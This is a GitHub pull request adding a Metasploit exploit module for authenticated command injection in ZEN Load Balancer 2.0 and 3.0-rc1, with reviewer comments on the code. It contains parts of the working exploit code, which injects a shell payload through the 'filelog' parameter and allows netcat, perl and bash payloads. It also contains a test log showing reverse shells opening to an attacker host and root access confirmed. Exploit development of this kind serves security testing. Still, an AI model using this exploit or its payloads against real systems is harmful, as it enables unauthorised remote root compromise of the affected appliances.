add ZEN Load Balancer module #817

Merged
merged 1 commit into from Sep 21, 2012

Projects

None yet

2 participants

@bcoles
Contributor
bcoles commented Sep 21, 2012

Add ZEN Load Balancer v2.0 and 3.0-rc1 Filelog Command Execution exploit module

  • Requires credentials
  • Remote root
  • Tested on:
    • 2.0 stable
    • 3.0-rc1

ZEN Load Balancer v2.0 and 3.0-rc1 Command Execution exploit

@jvazquez-r7
Contributor

Thanks bcoles,

looking into this!

@jvazquez-r7 jvazquez-r7 commented on the diff Sep 21, 2012
modules/exploits/linux/http/zen_load_balancer_exec.rb
+ auth = Rex::Text.encode_base64("#{user}:#{pass}")
+ cmd = Rex::Text.uri_encode(";#{payload.encoded}&")
+ lines = rand(100) + 1
+
+ # send payload
+ print_status("#{@peer} - Sending payload (#{payload.encoded.length} bytes)")
+ begin
+ res = send_request_cgi({
+ 'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",
+ 'headers' =>
+ {
+ 'Authorization' => "Basic #{auth}"
+ }
+ }, 25)
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ fail_with(Exploit::Failure::Unknown, 'Connection failed')
@jvazquez-r7
jvazquez-r7 Sep 21, 2012 Contributor

I think here Exploit::Failure::Unreachable suits better :)

@jvazquez-r7
Contributor

Tested successfully on ZEN Load Balancer v2.0 and 3.0-rc1

msf  exploit(zen_load_balancer_exec) > set RHOST 192.168.1.167
RHOST => 192.168.1.167
msf  exploit(zen_load_balancer_exec) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.167:444 - Sending payload (595 bytes)
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.167:60052) at 2012-09-21 11:22:54 +0200
id;
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 1? [y/N]  y
msf  exploit(zen_load_balancer_exec) > set RHOST 192.168.1.177
RHOST => 192.168.1.177
msf  exploit(zen_load_balancer_exec) > check
[*] 192.168.1.177:444 - Sending check
[*] The target appears to be vulnerable.
msf  exploit(zen_load_balancer_exec) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.177:444 - Sending payload (151 bytes)
[*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.177:43453) at 2012-09-21 11:30:21 +0200
id;
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 3? [y/N]  y
[*] 192.168.1.177 - Command shell session 3 closed.  Reason: User exit

merging!

@jvazquez-r7 jvazquez-r7 commented on the diff Sep 21, 2012
modules/exploits/linux/http/zen_load_balancer_exec.rb
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00",
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic netcat-e perl bash',
+ }
+ },
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'Privileged' => false,
@jvazquez-r7
jvazquez-r7 Sep 21, 2012 Contributor

must be true

@jvazquez-r7 jvazquez-r7 commented on the diff Sep 21, 2012
modules/exploits/linux/http/zen_load_balancer_exec.rb
+ 'Description' => %q{
+ This module exploits a vulnerability in ZEN Load Balancer
+ version 2.0 and 3.0-rc1 which could be abused to allow authenticated users
+ to execute arbitrary code under the context of the 'root' user.
+ The 'content2-2.cgi' file uses user controlled data from the 'filelog'
+ parameter within backticks.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/'],
+ #['OSVDB', 'None'],
@jvazquez-r7
jvazquez-r7 Sep 21, 2012 Contributor

I'm going to ask for a osvdb

@jvazquez-r7 jvazquez-r7 merged commit 6ee2c32 into rapid7:master Sep 21, 2012
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment